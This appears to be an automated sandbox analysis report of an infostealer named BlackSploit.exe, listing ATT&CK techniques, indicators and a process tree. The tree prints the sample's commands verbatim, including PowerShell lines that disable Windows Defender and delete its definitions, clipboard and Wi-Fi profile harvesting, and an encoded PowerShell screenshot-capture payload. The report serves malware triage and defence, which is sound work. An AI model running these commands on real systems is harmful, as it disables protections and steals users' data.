99d289bafdaa037e8752dfd5b691f0ae5d5b19b1ad412476136ee3a5cd4f6750

Analysis

max time kernel
24s
max time network
26s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
11-01-2025 08:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BlackSploit.exe
Size

6.0MB
MD5

b51e7a22a859ee46383706d5da7386cd
SHA1

ffe204e861581e88c5b4a040e0ecab267d85770f
SHA256

99d289bafdaa037e8752dfd5b691f0ae5d5b19b1ad412476136ee3a5cd4f6750
SHA512

f0b24f006f288a4579ba8b47ebde6f7275273c0bb23e1b2e0546e5528134147bddb3715e92e344d95db7de59fc1134a2948cd26214316eae37f9158507cc6721
SSDEEP

98304:DUIu4+Dc0d3mamaHl3Ne4i3gDUZnhhM7M+yvFaW9cIzaF6ARwDtyDe2HZMGZ3zlv:DXp+DX3PeNoInY7/sHfbRy9WGQWZQTk

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1236	powershell.exe
4332	powershell.exe
1192	powershell.exe
2268	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1916	cmd.exe
4940	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3388	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
596	BlackSploit.exe
596	BlackSploit.exe
596	BlackSploit.exe
596	BlackSploit.exe
596	BlackSploit.exe
596	BlackSploit.exe
596	BlackSploit.exe
596	BlackSploit.exe
596	BlackSploit.exe
596	BlackSploit.exe
596	BlackSploit.exe
596	BlackSploit.exe
596	BlackSploit.exe
596	BlackSploit.exe
596	BlackSploit.exe
596	BlackSploit.exe
596	BlackSploit.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
21	discord.com
20	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
1944	tasklist.exe
4220	tasklist.exe
4004	tasklist.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023b76-21.dat	upx
behavioral2/memory/596-25-0x00007FFDF2270000-0x00007FFDF26DE000-memory.dmp	upx
behavioral2/files/0x000a000000023b69-27.dat	upx
behavioral2/memory/596-30-0x00007FFE067F0000-0x00007FFE06814000-memory.dmp	upx
behavioral2/files/0x000a000000023b74-29.dat	upx
behavioral2/files/0x0031000000023b70-48.dat	upx
behavioral2/files/0x000a000000023b6f-47.dat	upx
behavioral2/files/0x000a000000023b6e-46.dat	upx
behavioral2/files/0x000a000000023b6d-45.dat	upx
behavioral2/files/0x000a000000023b6c-44.dat	upx
behavioral2/files/0x000a000000023b6b-43.dat	upx
behavioral2/files/0x000a000000023b6a-42.dat	upx
behavioral2/memory/596-41-0x00007FFE0AAF0000-0x00007FFE0AAFF000-memory.dmp	upx
behavioral2/files/0x000a000000023b68-40.dat	upx
behavioral2/files/0x000a000000023b7b-39.dat	upx
behavioral2/files/0x000a000000023b7a-38.dat	upx
behavioral2/files/0x000a000000023b79-37.dat	upx
behavioral2/files/0x000a000000023b75-34.dat	upx
behavioral2/files/0x000a000000023b73-33.dat	upx
behavioral2/memory/596-54-0x00007FFE04DB0000-0x00007FFE04DDD000-memory.dmp	upx
behavioral2/memory/596-56-0x00007FFE06670000-0x00007FFE06689000-memory.dmp	upx
behavioral2/memory/596-58-0x00007FFE04D90000-0x00007FFE04DAF000-memory.dmp	upx
behavioral2/memory/596-60-0x00007FFE00750000-0x00007FFE008B9000-memory.dmp	upx
behavioral2/memory/596-62-0x00007FFE04D70000-0x00007FFE04D89000-memory.dmp	upx
behavioral2/memory/596-64-0x00007FFE04D60000-0x00007FFE04D6D000-memory.dmp	upx
behavioral2/memory/596-66-0x00007FFE00F50000-0x00007FFE00F7E000-memory.dmp	upx
behavioral2/memory/596-71-0x00007FFE00A20000-0x00007FFE00AD8000-memory.dmp	upx
behavioral2/memory/596-70-0x00007FFDF2270000-0x00007FFDF26DE000-memory.dmp	upx
behavioral2/memory/596-73-0x00007FFDF1EF0000-0x00007FFDF2265000-memory.dmp	upx
behavioral2/memory/596-74-0x00007FFE067F0000-0x00007FFE06814000-memory.dmp	upx
behavioral2/memory/596-81-0x00007FFE00300000-0x00007FFE00418000-memory.dmp	upx
behavioral2/memory/596-80-0x00007FFE06670000-0x00007FFE06689000-memory.dmp	upx
behavioral2/memory/596-78-0x00007FFE017C0000-0x00007FFE017CD000-memory.dmp	upx
behavioral2/memory/596-76-0x00007FFE00F30000-0x00007FFE00F44000-memory.dmp	upx
behavioral2/memory/596-82-0x00007FFE04D90000-0x00007FFE04DAF000-memory.dmp	upx
behavioral2/memory/596-85-0x00007FFE00750000-0x00007FFE008B9000-memory.dmp	upx
behavioral2/memory/596-168-0x00007FFE04D70000-0x00007FFE04D89000-memory.dmp	upx
behavioral2/memory/596-254-0x00007FFE00F50000-0x00007FFE00F7E000-memory.dmp	upx
behavioral2/memory/596-266-0x00007FFE00A20000-0x00007FFE00AD8000-memory.dmp	upx
behavioral2/memory/596-278-0x00007FFDF1EF0000-0x00007FFDF2265000-memory.dmp	upx
behavioral2/memory/596-312-0x00007FFE04D90000-0x00007FFE04DAF000-memory.dmp	upx
behavioral2/memory/596-308-0x00007FFE067F0000-0x00007FFE06814000-memory.dmp	upx
behavioral2/memory/596-313-0x00007FFE00750000-0x00007FFE008B9000-memory.dmp	upx
behavioral2/memory/596-307-0x00007FFDF2270000-0x00007FFDF26DE000-memory.dmp	upx
behavioral2/memory/596-351-0x00007FFE00300000-0x00007FFE00418000-memory.dmp	upx
behavioral2/memory/596-352-0x00007FFDF1EF0000-0x00007FFDF2265000-memory.dmp	upx
behavioral2/memory/596-350-0x00007FFE017C0000-0x00007FFE017CD000-memory.dmp	upx
behavioral2/memory/596-349-0x00007FFE00F30000-0x00007FFE00F44000-memory.dmp	upx
behavioral2/memory/596-347-0x00007FFE00A20000-0x00007FFE00AD8000-memory.dmp	upx
behavioral2/memory/596-346-0x00007FFE00F50000-0x00007FFE00F7E000-memory.dmp	upx
behavioral2/memory/596-345-0x00007FFE04D60000-0x00007FFE04D6D000-memory.dmp	upx
behavioral2/memory/596-344-0x00007FFE04D70000-0x00007FFE04D89000-memory.dmp	upx
behavioral2/memory/596-343-0x00007FFE00750000-0x00007FFE008B9000-memory.dmp	upx
behavioral2/memory/596-342-0x00007FFE04D90000-0x00007FFE04DAF000-memory.dmp	upx
behavioral2/memory/596-341-0x00007FFE06670000-0x00007FFE06689000-memory.dmp	upx
behavioral2/memory/596-340-0x00007FFE04DB0000-0x00007FFE04DDD000-memory.dmp	upx
behavioral2/memory/596-339-0x00007FFE0AAF0000-0x00007FFE0AAFF000-memory.dmp	upx
behavioral2/memory/596-338-0x00007FFE067F0000-0x00007FFE06814000-memory.dmp	upx
behavioral2/memory/596-337-0x00007FFDF2270000-0x00007FFDF26DE000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4416	netsh.exe
4476	cmd.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4300	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4184	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
1192	powershell.exe
2268	powershell.exe
2268	powershell.exe
1192	powershell.exe
1192	powershell.exe
4940	powershell.exe
4940	powershell.exe
4940	powershell.exe
2156	powershell.exe
2156	powershell.exe
2156	powershell.exe
1236	powershell.exe
1236	powershell.exe
456	powershell.exe
456	powershell.exe
4332	powershell.exe
4332	powershell.exe
2900	powershell.exe
2900	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1192	powershell.exe
Token: SeDebugPrivilege	2268	powershell.exe
Token: SeDebugPrivilege	1944	tasklist.exe
Token: SeDebugPrivilege	4220	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4540	WMIC.exe
Token: SeSecurityPrivilege	4540	WMIC.exe
Token: SeTakeOwnershipPrivilege	4540	WMIC.exe
Token: SeLoadDriverPrivilege	4540	WMIC.exe
Token: SeSystemProfilePrivilege	4540	WMIC.exe
Token: SeSystemtimePrivilege	4540	WMIC.exe
Token: SeProfSingleProcessPrivilege	4540	WMIC.exe
Token: SeIncBasePriorityPrivilege	4540	WMIC.exe
Token: SeCreatePagefilePrivilege	4540	WMIC.exe
Token: SeBackupPrivilege	4540	WMIC.exe
Token: SeRestorePrivilege	4540	WMIC.exe
Token: SeShutdownPrivilege	4540	WMIC.exe
Token: SeDebugPrivilege	4540	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4540	WMIC.exe
Token: SeRemoteShutdownPrivilege	4540	WMIC.exe
Token: SeUndockPrivilege	4540	WMIC.exe
Token: SeManageVolumePrivilege	4540	WMIC.exe
Token: 33	4540	WMIC.exe
Token: 34	4540	WMIC.exe
Token: 35	4540	WMIC.exe
Token: 36	4540	WMIC.exe
Token: SeDebugPrivilege	4004	tasklist.exe
Token: SeDebugPrivilege	4940	powershell.exe
Token: SeIncreaseQuotaPrivilege	4540	WMIC.exe
Token: SeSecurityPrivilege	4540	WMIC.exe
Token: SeTakeOwnershipPrivilege	4540	WMIC.exe
Token: SeLoadDriverPrivilege	4540	WMIC.exe
Token: SeSystemProfilePrivilege	4540	WMIC.exe
Token: SeSystemtimePrivilege	4540	WMIC.exe
Token: SeProfSingleProcessPrivilege	4540	WMIC.exe
Token: SeIncBasePriorityPrivilege	4540	WMIC.exe
Token: SeCreatePagefilePrivilege	4540	WMIC.exe
Token: SeBackupPrivilege	4540	WMIC.exe
Token: SeRestorePrivilege	4540	WMIC.exe
Token: SeShutdownPrivilege	4540	WMIC.exe
Token: SeDebugPrivilege	4540	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4540	WMIC.exe
Token: SeRemoteShutdownPrivilege	4540	WMIC.exe
Token: SeUndockPrivilege	4540	WMIC.exe
Token: SeManageVolumePrivilege	4540	WMIC.exe
Token: 33	4540	WMIC.exe
Token: 34	4540	WMIC.exe
Token: 35	4540	WMIC.exe
Token: 36	4540	WMIC.exe
Token: SeDebugPrivilege	2156	powershell.exe
Token: SeDebugPrivilege	1236	powershell.exe
Token: SeDebugPrivilege	456	powershell.exe
Token: SeIncreaseQuotaPrivilege	4860	WMIC.exe
Token: SeSecurityPrivilege	4860	WMIC.exe
Token: SeTakeOwnershipPrivilege	4860	WMIC.exe
Token: SeLoadDriverPrivilege	4860	WMIC.exe
Token: SeSystemProfilePrivilege	4860	WMIC.exe
Token: SeSystemtimePrivilege	4860	WMIC.exe
Token: SeProfSingleProcessPrivilege	4860	WMIC.exe
Token: SeIncBasePriorityPrivilege	4860	WMIC.exe
Token: SeCreatePagefilePrivilege	4860	WMIC.exe
Token: SeBackupPrivilege	4860	WMIC.exe
Token: SeRestorePrivilege	4860	WMIC.exe
Token: SeShutdownPrivilege	4860	WMIC.exe
Token: SeDebugPrivilege	4860	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2672 wrote to memory of 596	2672	BlackSploit.exe	82
PID 2672 wrote to memory of 596	2672	BlackSploit.exe	82
PID 596 wrote to memory of 3592	596	BlackSploit.exe	83
PID 596 wrote to memory of 3592	596	BlackSploit.exe	83
PID 596 wrote to memory of 1796	596	BlackSploit.exe	84
PID 596 wrote to memory of 1796	596	BlackSploit.exe	84
PID 1796 wrote to memory of 1192	1796	cmd.exe	87
PID 1796 wrote to memory of 1192	1796	cmd.exe	87
PID 3592 wrote to memory of 2268	3592	cmd.exe	88
PID 3592 wrote to memory of 2268	3592	cmd.exe	88
PID 596 wrote to memory of 3752	596	BlackSploit.exe	89
PID 596 wrote to memory of 3752	596	BlackSploit.exe	89
PID 596 wrote to memory of 2092	596	BlackSploit.exe	90
PID 596 wrote to memory of 2092	596	BlackSploit.exe	90
PID 2092 wrote to memory of 1944	2092	cmd.exe	93
PID 2092 wrote to memory of 1944	2092	cmd.exe	93
PID 3752 wrote to memory of 4220	3752	cmd.exe	94
PID 3752 wrote to memory of 4220	3752	cmd.exe	94
PID 596 wrote to memory of 1916	596	BlackSploit.exe	96
PID 596 wrote to memory of 1916	596	BlackSploit.exe	96
PID 596 wrote to memory of 4176	596	BlackSploit.exe	95
PID 596 wrote to memory of 4176	596	BlackSploit.exe	95
PID 596 wrote to memory of 3928	596	BlackSploit.exe	99
PID 596 wrote to memory of 3928	596	BlackSploit.exe	99
PID 596 wrote to memory of 1536	596	BlackSploit.exe	100
PID 596 wrote to memory of 1536	596	BlackSploit.exe	100
PID 596 wrote to memory of 4476	596	BlackSploit.exe	103
PID 596 wrote to memory of 4476	596	BlackSploit.exe	103
PID 596 wrote to memory of 1912	596	BlackSploit.exe	104
PID 596 wrote to memory of 1912	596	BlackSploit.exe	104
PID 596 wrote to memory of 4520	596	BlackSploit.exe	107
PID 596 wrote to memory of 4520	596	BlackSploit.exe	107
PID 4176 wrote to memory of 4540	4176	cmd.exe	110
PID 4176 wrote to memory of 4540	4176	cmd.exe	110
PID 1916 wrote to memory of 4940	1916	cmd.exe	111
PID 1916 wrote to memory of 4940	1916	cmd.exe	111
PID 3928 wrote to memory of 4004	3928	cmd.exe	112
PID 3928 wrote to memory of 4004	3928	cmd.exe	112
PID 1536 wrote to memory of 1464	1536	cmd.exe	113
PID 1536 wrote to memory of 1464	1536	cmd.exe	113
PID 1912 wrote to memory of 4184	1912	cmd.exe	114
PID 1912 wrote to memory of 4184	1912	cmd.exe	114
PID 4476 wrote to memory of 4416	4476	cmd.exe	115
PID 4476 wrote to memory of 4416	4476	cmd.exe	115
PID 4520 wrote to memory of 2156	4520	cmd.exe	116
PID 4520 wrote to memory of 2156	4520	cmd.exe	116
PID 596 wrote to memory of 2392	596	BlackSploit.exe	117
PID 596 wrote to memory of 2392	596	BlackSploit.exe	117
PID 2392 wrote to memory of 1008	2392	cmd.exe	119
PID 2392 wrote to memory of 1008	2392	cmd.exe	119
PID 596 wrote to memory of 3360	596	BlackSploit.exe	120
PID 596 wrote to memory of 3360	596	BlackSploit.exe	120
PID 3360 wrote to memory of 1468	3360	cmd.exe	122
PID 3360 wrote to memory of 1468	3360	cmd.exe	122
PID 596 wrote to memory of 4944	596	BlackSploit.exe	123
PID 596 wrote to memory of 4944	596	BlackSploit.exe	123
PID 4944 wrote to memory of 2932	4944	cmd.exe	125
PID 4944 wrote to memory of 2932	4944	cmd.exe	125
PID 2156 wrote to memory of 1068	2156	powershell.exe	126
PID 2156 wrote to memory of 1068	2156	powershell.exe	126
PID 596 wrote to memory of 468	596	BlackSploit.exe	127
PID 596 wrote to memory of 468	596	BlackSploit.exe	127
PID 468 wrote to memory of 5024	468	cmd.exe	129
PID 468 wrote to memory of 5024	468	cmd.exe	129

C:\Users\Admin\AppData\Local\Temp\BlackSploit.exe
"C:\Users\Admin\AppData\Local\Temp\BlackSploit.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2672
- C:\Users\Admin\AppData\Local\Temp\BlackSploit.exe
  "C:\Users\Admin\AppData\Local\Temp\BlackSploit.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BlackSploit.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3592
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BlackSploit.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1796
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3752
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2092
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4176
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:1916
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3928
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1536
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4476
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1912
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4520
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 